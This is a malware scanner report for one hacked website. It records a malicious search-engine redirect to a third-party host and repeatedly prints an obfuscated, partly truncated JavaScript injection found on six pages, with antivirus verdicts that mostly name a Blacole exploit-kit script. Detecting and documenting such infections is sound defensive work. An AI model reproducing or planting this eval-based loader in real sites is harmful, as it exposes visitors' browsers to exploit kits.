New scan:

Malware Scanner report for hilltopassociates.net

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://riversa-spv.es/includes/esd.php
11 websites infected.

The website "hilltopassociates.net" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://hilltopassociates.net/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: hilltopassociates.net
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 11 Sep 2014 23:06:40 GMT
Location: http://riversa-spv.es/includes/esd.php
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://hilltopassociates.net/
200 OK
Content-Length: 14685
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://hilltopassociates.net/../index.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/test404page.js
404 Not Found
Content-Length: 5520
Content-Type: text/html
clean
http://hilltopassociates.net/../services.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/../website.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/virus.htm
200 OK
Content-Length: 27181
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://p.moreover.com/cgi-local/page?index_viruswarning+js+js
200 OK
Content-Length: 83
Content-Type: text/plain
clean
http://p.moreover.com/dont_redirect/wizard_text.js
200 OK
Content-Length: 320
Content-Type: application/x-javascript
clean
http://hilltopassociates.net/host/index.htm
200 OK
Content-Length: 22255
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://hilltopassociates.net/host/../index.htm
200 OK
Content-Length: 14685
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://hilltopassociates.net/host/../../index.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/host/../../services.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/host/../../website.htm
400 Bad Request
Content-Length: 345
Content-Type: text/html
clean
http://hilltopassociates.net/host/../virus.htm
200 OK
Content-Length: 27181
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://hilltopassociates.net/host/../host/index.htm
200 OK
Content-Length: 22255
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

zznu="s"+"p"+"li"+"t";lti=window;cumkwi="dy";rrtrj=document;oxwft="0x";gqh=(5-3-1);try{++(rrtrj.body)}catch(chfo){lkfh=false;try{}catch(gunckw){lkfh=21;}if(1){cijih="17:5d:6c:65:5a:6b:60:66:65:17:6a:62:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:62:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:3
... 3466 bytes are skipped ...
:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:62:27:30:1f:20:32:4:1:74:4:1:74"[zznu](":");}lti=cijih;pejyj=[];for(xngp=22-20-2;-xngp+1401!=0;xngp+=1){nlih=xngp;if((0x19==031))pejyj+=String["fromCharCode"](eval(oxwft+lti[1*nlih])+0xa-gqh);}mfcysj=eval;mfcysj(pejyj)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Bkav
MW.Clodb1f.Trojan.c82a
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
TrendMicro-HouseCall
TROJ_GEN.F47V1103
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hilltopassociates.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hilltopassociates.net/

Result: hilltopassociates.net is not infected or malware details are not published yet.